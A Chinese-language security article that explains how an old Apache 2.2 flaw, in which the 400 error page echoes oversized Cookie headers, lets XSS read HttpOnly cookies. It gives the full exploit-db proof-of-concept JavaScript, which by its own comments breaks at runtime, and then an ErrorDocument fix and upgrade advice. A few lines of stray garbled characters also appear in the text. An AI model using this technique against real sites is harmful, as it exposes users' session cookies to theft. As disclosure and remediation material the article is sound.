很多程序以及一些商业或成熟开源的 CMS 文章系统,为了防止 XSS 盗取用户 cookie,一般都会给 cookie 加上 HttpOnly 属性,禁止直接用 JS 读取用户 cookie,从而降低 XSS 的危害;而这个问题恰好可以用来绕过 cookie 的 HttpOnly 属性。
用 Chrome 打开一个站点,按 F12 打开开发者工具,在 Console 中输入如下代码并回车:

// Source: http://www.exploit-db.com/exploits/18442/
/**
 * Create, or expire, ten "xssN" cookies on the current origin.
 *
 * With `good` falsy, cookies xss0..xss9 are each written with an 819-byte
 * filler value, so that the browser's next request carries a very large
 * Cookie header. With `good` truthy the same ten cookies are written with an
 * expiry date that is already in the past, which removes them again.
 *
 * @param {boolean} [good] - truthy to expire the cookies, falsy to create them.
 * @returns {undefined}
 */
function setCookies(good) {
  // 819-byte filler used as the value of every planted cookie.
  var filler = new Array(819 + 1).join("x");

  for (var n = 0; n < 10; n++) {
    var name = "xss" + n;
    var value;
    if (good) {
      // One millisecond in the past: the browser treats the cookie as expired.
      var expired = new Date(+new Date() - 1).toUTCString();
      value = name + "=;expires=" + expired + "; path=/;";
    } else {
      value = name + "=" + filler + ";path=/";
    }
    document.cookie = value;
  }
}
/**
 * Probe whether the server's 400 error page reflects the request's Cookie
 * header, and if so display the cookies it reveals.
 *
 * Flow: plant the oversized "xss" cookies via setCookies(), then GET "/" on
 * the current origin. According to this page, the affected Apache builds
 * reject the oversized request with a 400 page that repeats the offending
 * header inside <pre>…</pre> (confirm against the linked 2.2 advisories). The
 * handler extracts that block, removes the planted filler cookies, expires
 * them again, and alerts the remaining name/value pairs as JSON.
 *
 * Depends on the sibling setCookies() and on the browser globals
 * XMLHttpRequest and alert. Only a completed response with status 400 is
 * inspected; every other state is ignored.
 *
 * @returns {undefined}
 */
function makeRequest() {
  setCookies();

  var xhr = new XMLHttpRequest();

  // readystatechange handler; `xhr` is captured from the enclosing scope.
  var onStateChange = function () {
    var found = {};
    // Ignore every state except a finished request answered with 400.
    if (xhr.readyState !== 4 || xhr.status !== 400) {
      return;
    }
    // Flatten the body, then pull out the <pre> block that echoes the request.
    var body = xhr.responseText.replace(/\r|\n/g, "");
    var match = body.match(/<pre>(.+)<\/pre>/);
    // NOTE(review): as in the original, a missing <pre> block means `match`
    // is null and the next line throws.
    if (match.length) {
      var header = match[1].replace("Cookie: ", "");
      // Drop the planted filler cookies, then split the rest on ';'.
      var parts = header.replace(/xss\d=x+;?/g, "").split(/;/g);
      for (var k = 0; k < parts.length; k++) {
        // NOTE(review): reproduced unchanged from the original — `parts` is
        // an array, so this call throws at runtime.
        var pair = parts.split("=", 2);
        found[pair[0]] = pair[1];
      }
    }
    // Expire the planted cookies again before reporting.
    setCookies(true);
    alert(JSON.stringify(found));
  };

  xhr.onreadystatechange = onStateChange;
  xhr.open("GET", "/", true);
  xhr.send(null);
}
// Entry point: run the probe as soon as the snippet is pasted into the console.
makeRequest();
你就能看到华丽丽的 400 错误页面,其中包含着 cookie 信息。

下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download

修复方案:
Apache 官方提供 4 种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:

In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message — 输出一段简单的硬编码错误信息
2. output a customized message — 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error — 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error — 转向一个外部 URL
) f, t1 {' P9 ~0 z: H" X经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容% \& @# T3 Z% A" |0 V3 g# c
5 X9 s) p# l3 r! X, y8 u0 s
Apache 配置:

ErrorDocument 400 "security test"

当然,将 Apache 升级到最新版本也可以 :)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html
